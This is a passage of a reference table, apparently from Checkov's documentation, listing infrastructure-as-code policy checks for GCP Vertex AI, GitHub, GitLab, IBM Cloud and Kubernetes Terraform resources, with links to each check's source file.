[GCPVertexAIPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIPrivateEndpoint.yaml) | +| 1803 | CKV2_GCP_34 | resource | google_vertex_ai_index_endpoint | Ensure Vertex AI index endpoint is private | Terraform | [GCPVertexAIPrivateIndexEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIPrivateIndexEndpoint.yaml) | +| 1804 | CKV2_GCP_35 | resource | google_notebooks_runtime | Ensure Vertex AI runtime is encrypted with a Customer Managed Key (CMK) | Terraform | [GCPVertexRuntimeEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexRuntimeEncryptedWithCMK.yaml) | +| 1805 | CKV2_GCP_36 | resource | google_notebooks_runtime | Ensure Vertex AI runtime is private | Terraform | [GCPVertexRuntimePrivate.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexRuntimePrivate.yaml) | +| 1806 | CKV_GIT_1 | resource | github_repository | Ensure GitHub repository is Private | Terraform | [PrivateRepo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/PrivateRepo.py) | +| 1807 | CKV_GIT_2 | resource | github_repository_webhook | Ensure GitHub repository webhooks are using HTTPS | Terraform | [WebhookInsecureSsl.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/WebhookInsecureSsl.py) | +| 1808 | CKV_GIT_3 | resource | github_repository | Ensure GitHub repository has vulnerability alerts enabled | Terraform | [RepositoryEnableVulnerabilityAlerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/RepositoryEnableVulnerabilityAlerts.py) | +| 1809 | CKV_GIT_4 | resource | github_actions_environment_secret | Ensure GitHub Actions secrets are encrypted | Terraform | [SecretsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/SecretsEncrypted.py) | +| 1810 | CKV_GIT_4 | resource | github_actions_organization_secret | Ensure GitHub Actions secrets are encrypted | Terraform | [SecretsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/SecretsEncrypted.py) | +| 1811 | CKV_GIT_4 | resource | github_actions_secret | Ensure GitHub Actions secrets are encrypted | Terraform | [SecretsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/SecretsEncrypted.py) | +| 1812 | CKV_GIT_5 | resource | github_branch_protection | GitHub pull requests should require at least 2 approvals | Terraform | [BranchProtectionReviewNumTwo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionReviewNumTwo.py) | +| 1813 | CKV_GIT_5 | resource | github_branch_protection_v3 | GitHub pull requests should require at least 2 approvals | Terraform | [BranchProtectionReviewNumTwo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionReviewNumTwo.py) | +| 1814 | CKV_GIT_6 | resource | github_branch_protection | Ensure GitHub branch protection rules requires signed commits | Terraform | [BranchProtectionRequireSignedCommits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionRequireSignedCommits.py) | +| 1815 | CKV_GIT_6 | resource | github_branch_protection_v3 | Ensure GitHub branch protection rules requires signed commits | Terraform | [BranchProtectionRequireSignedCommits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionRequireSignedCommits.py) | +| 1816 | CKV2_GIT_1 | resource | github_repository | Ensure each Repository has branch protection associated | Terraform | [RepositoryHasBranchProtection.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/github/RepositoryHasBranchProtection.yaml) | +| 1817 | CKV_GLB_1 | resource | gitlab_project | Ensure at least two approving reviews are required to merge a GitLab MR | Terraform | [RequireTwoApprovalsToMerge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/RequireTwoApprovalsToMerge.py) | +| 1818 | CKV_GLB_2 | resource | gitlab_branch_protection | Ensure GitLab branch protection rules does not allow force pushes | Terraform | [ForcePushDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/ForcePushDisabled.py) | +| 1819 | CKV_GLB_3 | resource | gitlab_project | Ensure GitLab prevent secrets is enabled | Terraform | [PreventSecretsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/PreventSecretsEnabled.py) | +| 1820 | CKV_GLB_4 | resource | gitlab_project | Ensure GitLab commits are signed | Terraform | [RejectUnsignedCommits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/RejectUnsignedCommits.py) | +| 1821 | CKV2_IBM_1 | resource | ibm_is_lb | Ensure load balancer for VPC is private (disable public access) | Terraform | [IBM_LoadBalancerforVPCisPrivate.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_LoadBalancerforVPCisPrivate.yaml) | +| 1822 | CKV2_IBM_2 | resource | ibm_is_vpc | Ensure VPC classic access is disabled | Terraform | [IBM_VPCclassicAccessIsDisabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_VPCclassicAccessIsDisabled.yaml) | +| 1823 | CKV2_IBM_3 | resource | ibm_iam_account_settings | Ensure API key creation is restricted in account settings | Terraform | [IBM_RestrictAPIkeyCreationInAccountSettings.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_RestrictAPIkeyCreationInAccountSettings.yaml) | +| 1824 | CKV2_IBM_4 | resource | ibm_iam_account_settings | Ensure Multi-Factor Authentication (MFA) is enabled at the account level | Terraform | [IBM_EnableMFAatAccountLevel.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_EnableMFAatAccountLevel.yaml) | +| 1825 | CKV2_IBM_5 | resource | ibm_iam_account_settings | Ensure Service ID creation is restricted in account settings | Terraform | [IBM_RestrictServiceIDCreationInAccountSettings.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_RestrictServiceIDCreationInAccountSettings.yaml) | +| 1826 | CKV2_IBM_6 | resource | ibm_database | Ensure Databases network access is restricted to a specific IP range | Terraform | [IBM_DatabasesNWaccessRestrictedToSpecificIPrange.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_DatabasesNWaccessRestrictedToSpecificIPrange.yaml) | +| 1827 | CKV2_IBM_7 | resource | ibm_container_cluster | Ensure Kubernetes clusters are accessible by using private endpoint and NOT public endpoint | Terraform | [IBM_K8sClustersAccessibleViaPrivateEndPt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_K8sClustersAccessibleViaPrivateEndPt.yaml) | +| 1828 | CKV_K8S_1 | resource | kubernetes_pod_security_policy | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPIDPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPIDPSP.py) | +| 1829 | CKV_K8S_2 | resource | kubernetes_pod_security_policy | Do not admit privileged containers | Terraform | [PrivilegedContainerPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainerPSP.py) | +| 1830 | CKV_K8S_3 | resource | kubernetes_pod_security_policy | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPCPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPCPSP.py) | +| 1831 | CKV_K8S_4 | resource | kubernetes_pod_security_policy | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespacePSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespacePSP.py) | +| 1832 | CKV_K8S_5 | resource | kubernetes_pod_security_policy | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalationPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalationPSP.py) | +| 1833 | CKV_K8S_6 | resource | kubernetes_pod_security_policy | Do not admit root containers | Terraform | [RootContainerPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/RootContainerPSP.py) | +| 1834 | CKV_K8S_7 | resource | kubernetes_pod_security_policy | Do not admit containers with the NET_RAW capability | Terraform | [DropCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilitiesPSP.py) | +| 1835 | CKV_K8S_8 | resource | kubernetes_deployment | Liveness Probe Should be Configured | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py) | +| 1836 | CKV_K8S_8 | resource | kubernetes_deployment_v1 | Liveness Probe Should be Configured | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py) | +| 1837 | CKV_K8S_8 | resource | kubernetes_pod | Liveness Probe Should be Configured | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py) | +| 1838 | CKV_K8S_8 | resource | kubernetes_pod_v1 | Liveness Probe Should be Configured | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py) | +| 1839 | CKV_K8S_9 | resource | kubernetes_deployment | Readiness Probe Should be Configured | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py) | +| 1840 | CKV_K8S_9 | resource | kubernetes_deployment_v1 | Readiness Probe Should be Configured | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py) | +| 1841 | CKV_K8S_9 | resource | kubernetes_pod | Readiness Probe Should be Configured | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py) | +| 1842 | CKV_K8S_9 | resource | kubernetes_pod_v1 | Readiness Probe Should be Configured | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py) | +| 1843 | CKV_K8S_10 | resource | kubernetes_deployment | CPU requests should be set | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py) | +| 1844 | CKV_K8S_10 | resource | kubernetes_deployment_v1 | CPU requests should be set | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py) | +| 1845 | CKV_K8S_10 | resource | kubernetes_pod | CPU requests should be set | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py) | +| 1846 | CKV_K8S_10 | resource | kubernetes_pod_v1 | CPU requests should be set | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py) | +| 1847 | CKV_K8S_11 | resource | kubernetes_deployment | CPU Limits should be set | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py) | +| 1848 | CKV_K8S_11 | resource | kubernetes_deployment_v1 | CPU Limits should be set | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py) | +| 1849 | CKV_K8S_11 | resource | kubernetes_pod | CPU Limits should be set | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py) | +| 1850 | CKV_K8S_11 | resource | kubernetes_pod_v1 | CPU Limits should be set | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py) | +| 1851 | CKV_K8S_12 | resource | kubernetes_deployment | Memory Limits should be set | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py) | +| 1852 | CKV_K8S_12 | resource | kubernetes_deployment_v1 | Memory Limits should be set | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py) | +| 1853 | CKV_K8S_12 | resource | kubernetes_pod | Memory Limits should be set | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py) | +| 1854 | CKV_K8S_12 | resource | kubernetes_pod_v1 | Memory Limits should be set | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py) | +| 1855 | CKV_K8S_13 | resource | kubernetes_deployment | Memory requests should be set | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py) | +| 1856 | CKV_K8S_13 | resource | kubernetes_deployment_v1 | Memory requests should be set | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py) | +| 1857 | CKV_K8S_13 | resource | kubernetes_pod | Memory requests should be set | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py) | +| 1858 | CKV_K8S_13 | resource | kubernetes_pod_v1 | Memory requests should be set | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py) | +| 1859 | CKV_K8S_14 | resource | kubernetes_deployment | Image Tag should be fixed - not latest or blank | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py) | +| 1860 | CKV_K8S_14 | resource | kubernetes_deployment_v1 | Image Tag should be fixed - not latest or blank | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py) | +| 1861 | CKV_K8S_14 | resource | kubernetes_pod | Image Tag should be fixed - not latest or blank | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py) | +| 1862 | CKV_K8S_14 | resource | kubernetes_pod_v1 | Image Tag should be fixed - not latest or blank | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py) | +| 1863 | CKV_K8S_15 | resource | kubernetes_deployment | Image Pull Policy should be Always | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py) | +| 1864 | CKV_K8S_15 | resource | kubernetes_deployment_v1 | Image Pull Policy should be Always | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py) | +| 1865 | CKV_K8S_15 | resource | kubernetes_pod | Image Pull Policy should be Always | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py) | +| 1866 | CKV_K8S_15 | resource | kubernetes_pod_v1 | Image Pull Policy should be Always | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py) | +| 1867 | CKV_K8S_16 | resource | kubernetes_deployment | Do not admit privileged containers | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py) | +| 1868 | CKV_K8S_16 | resource | kubernetes_deployment_v1 | Do not admit privileged containers | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py) | +| 1869 | CKV_K8S_16 | resource | kubernetes_pod | Do not admit privileged containers | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py) | +| 1870 | CKV_K8S_16 | resource | kubernetes_pod_v1 | Do not admit privileged containers | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py) | +| 1871 | CKV_K8S_17 | resource | kubernetes_deployment | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py) | +| 1872 | CKV_K8S_17 | resource | kubernetes_deployment_v1 | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py) | +| 1873 | CKV_K8S_17 | resource | kubernetes_pod | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py) | +| 1874 | CKV_K8S_17 | resource | kubernetes_pod_v1 | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py) | +| 1875 | CKV_K8S_18 | resource | kubernetes_deployment | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py) | +| 1876 | CKV_K8S_18 | resource | kubernetes_deployment_v1 | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py) | +| 1877 | CKV_K8S_18 | resource | kubernetes_pod | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py) | +| 1878 | CKV_K8S_18 | resource | kubernetes_pod_v1 | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py) | +| 1879 | CKV_K8S_19 | resource | kubernetes_deployment | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py) | +| 1880 | CKV_K8S_19 | resource | kubernetes_deployment_v1 | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py) | +| 1881 | CKV_K8S_19 | resource | kubernetes_pod | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py) | +| 1882 | CKV_K8S_19 | resource | kubernetes_pod_v1 | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py) | +| 1883 | CKV_K8S_20 | resource | kubernetes_deployment | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py) | +| 1884 | CKV_K8S_20 | resource | kubernetes_deployment_v1 | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py) | +| 1885 | CKV_K8S_20 | resource | kubernetes_pod | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py) | +| 1886 | CKV_K8S_20 | resource | kubernetes_pod_v1 | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py) | +| 1887 | CKV_K8S_21 | resource | kubernetes_config_map | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1888 | CKV_K8S_21 | resource | kubernetes_config_map_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1889 | CKV_K8S_21 | resource | kubernetes_cron_job | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1890 | CKV_K8S_21 | resource | kubernetes_cron_job_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1891 | CKV_K8S_21 | resource | kubernetes_daemon_set_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1892 | CKV_K8S_21 | resource | kubernetes_daemonset | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1893 | CKV_K8S_21 | resource | kubernetes_deployment | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1894 | CKV_K8S_21 | resource | kubernetes_deployment_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1895 | CKV_K8S_21 | resource | kubernetes_ingress | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1896 | CKV_K8S_21 | resource | kubernetes_ingress_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1897 | CKV_K8S_21 | resource | kubernetes_job | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1898 | CKV_K8S_21 | resource | kubernetes_job_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1899 | CKV_K8S_21 | resource | kubernetes_pod | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1900 | CKV_K8S_21 | resource | kubernetes_pod_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1901 | CKV_K8S_21 | resource | kubernetes_replication_controller | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1902 | CKV_K8S_21 | resource | kubernetes_replication_controller_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1903 | CKV_K8S_21 | resource | kubernetes_role_binding | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1904 | CKV_K8S_21 | resource | kubernetes_role_binding_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1905 | CKV_K8S_21 | resource | kubernetes_secret | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1906 | CKV_K8S_21 | resource | kubernetes_secret_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1907 | CKV_K8S_21 | resource | kubernetes_service | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1908 | CKV_K8S_21 | resource | kubernetes_service_account | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1909 | CKV_K8S_21 | resource | kubernetes_service_account_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1910 | CKV_K8S_21 | resource | kubernetes_service_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1911 | CKV_K8S_21 | resource | kubernetes_stateful_set | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1912 | CKV_K8S_21 | resource | kubernetes_stateful_set_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 1913 | CKV_K8S_22 | resource | kubernetes_deployment | Use read-only filesystem for containers where possible | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py) | +| 1914 | CKV_K8S_22 | resource | kubernetes_deployment_v1 | Use read-only filesystem for containers where possible | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py) | +| 1915 | CKV_K8S_22 | resource | kubernetes_pod | Use read-only filesystem for containers where possible | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py) | +| 1916 | CKV_K8S_22 | resource | kubernetes_pod_v1 | Use read-only filesystem for containers where possible | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py) | +| 1917 | CKV_K8S_24 | resource | kubernetes_pod_security_policy | Do not allow containers with added capability | Terraform | [AllowedCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesPSP.py) | +| 1918 | CKV_K8S_25 | resource | kubernetes_deployment | Minimize the admission of containers with added capability | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py) | +| 1919 | CKV_K8S_25 | resource | kubernetes_deployment_v1 | Minimize the admission of containers with added capability | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py) | +| 1920 | CKV_K8S_25 | resource | kubernetes_pod | Minimize the admission of containers with added capability | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py) | +| 1921 | CKV_K8S_25 | resource | kubernetes_pod_v1 | Minimize the admission of containers with added capability | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py) | +| 1922 | CKV_K8S_26 | resource | kubernetes_deployment | Do not specify hostPort unless absolutely necessary | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py) | +| 1923 | 